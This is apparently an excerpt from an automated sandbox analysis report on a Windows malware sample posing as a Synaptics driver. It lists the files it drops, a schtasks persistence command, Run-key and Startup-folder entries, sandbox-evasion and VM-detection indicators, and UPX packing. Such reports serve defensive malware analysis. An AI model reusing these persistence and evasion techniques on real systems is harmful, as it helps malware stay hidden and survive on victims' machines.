                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_002E20D0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_002E20D0
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_00178D99 push edi; retn 0000h2_2_00178D9B
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_00178F0E push F7FFFFFFh; retn 0000h2_2_00178F13
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_00197795 push ecx; ret 2_2_001977A8
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009B8D99 push edi; retn 0000h9_2_009B8D9B
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009B8F0E push F7FFFFFFh; retn 0000h9_2_009B8F13
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009D7795 push ecx; ret 9_2_009D77A8
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1
                                Source: initial sampleStatic PE information: section name: UPX0
                                Source: initial sampleStatic PE information: section name: UPX1

                                Persistence and Installation Behavior

                                barindex
                                Drops PE files to the document folder of the user
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1Jump to dropped file
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeFile created: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeJump to dropped file
                                Source: C:\Users\user\Desktop\AYRASY.exeFile created: C:\ProgramData\Synaptics\RCX4413.tmpJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1Jump to dropped file
                                Source: C:\Users\user\Desktop\AYRASY.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                Source: C:\Users\user\Desktop\AYRASY.exeFile created: C:\Users\user\Desktop\._cache_AYRASY.exeJump to dropped file
                                Source: C:\Users\user\Desktop\AYRASY.exeFile created: C:\ProgramData\Synaptics\RCX4413.tmpJump to dropped file
                                Source: C:\Users\user\Desktop\AYRASY.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\GAOBCVIQIJ\~$cache1Jump to dropped file

                                Boot Survival

                                barindex
                                Uses schtasks.exe or at.exe to add and modify task schedules
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WBHUSK.exe /tr C:\Users\user\AppData\Roaming\Windata\YOABSG.exe /sc minute /mo 1
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WBHUSK.lnkJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WBHUSK.lnkJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WBHUSKJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WBHUSKJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0018F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_0018F78E
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001D7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_001D7F0E
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009CF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,9_2_009CF78E
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A17F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,9_2_00A17F0E
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_00191E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00191E5A
                                Source: C:\Users\user\Desktop\AYRASY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Found API chain indicative of sandbox detection
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeWindow / User API: threadDelayed 4998Jump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeWindow / User API: foregroundWindowGot 1423Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeAPI coverage: 6.5 %
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeAPI coverage: 3.8 %
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe TID: 6708Thread sleep time: -49980s >= -30000sJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7404Thread sleep time: -1080000s >= -30000sJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7996Thread sleep time: -60000s >= -30000sJump to behavior
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeThread sleep count: Count: 4998 delay: -10Jump to behavior
                                Source: Yara matchFile source: 00000007.00000002.3411280080.0000000002D20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.3411537097.0000000002D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.3411537097.0000000002D97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3460, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\WBHUSK.vbs, type: DROPPED
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0018DD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_0018DD92
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001C2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_001C2044
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001C219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_001C219F
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001C24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_001C24A9
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001B6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_001B6B3F
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001B6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_001B6E4A
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001BF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_001BF350
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001BFD47 FindFirstFileW,FindClose,2_2_001BFD47
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_001BFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_001BFDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A02044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00A02044
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A0219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_00A0219F
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_00A024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_00A024A9
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_009F6B3F
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_009F6E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_009FF350
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009CDD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_009CDD92
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_009FFDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exeCode function: 9_2_009FFD47 FindFirstFileW,FindClose,9_2_009FFD47
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exeCode function: 2_2_0018E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_0018E47B
                                Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: Amcache.hve.17.drBinary or memory string: VMware
                                Source: Amcache.hve.17.drBinary or memory string: VMware Virtual USB Mouse
                                Source: Amcache.hve.17.drBinary or memory string: vmci.syshbin
                                Source: Amcache.hve.17.drBinary or memory string: VMware, Inc.
                                Source: Amcache.hve.17.drBinary or memory string: VMware20,1hbin@
                                Source: Amcache.hve.17.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                                Source: Amcache.hve.17.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                Source: Amcache.hve.17.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                                Source: Amcache.hve.17.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3412593994.000000000142A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2436766309.000000000072B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: Amcache.hve.17.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                Source: Amcache.hve.17.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                                Source: Amcache.hve.17.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                                Source: Amcache.hve.17.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3417393779.00000000047FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: YOABSG.exe, 00000016.00000003.3315057318.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\<
                                Source: Amcache.hve.17.drBinary or memory string: vmci.sys
                                Source: Amcache.hve.17.drBinary or memory string: vmci.syshbin`
                                Source: Amcache.hve.17.drBinary or memory string: \driver\vmci,\driver\pci
                                Source: Amcache.hve.17.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                Source: Amcache.hve.17.drBinary or memory string: VMware20,1
                                Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Generation Counter
                                Source: Amcache.hve.17.drBinary or memory string: NECVMWar VMware SATA CD00
                                Source: Amcache.hve.17.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                                Source: Amcache.hve.17.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
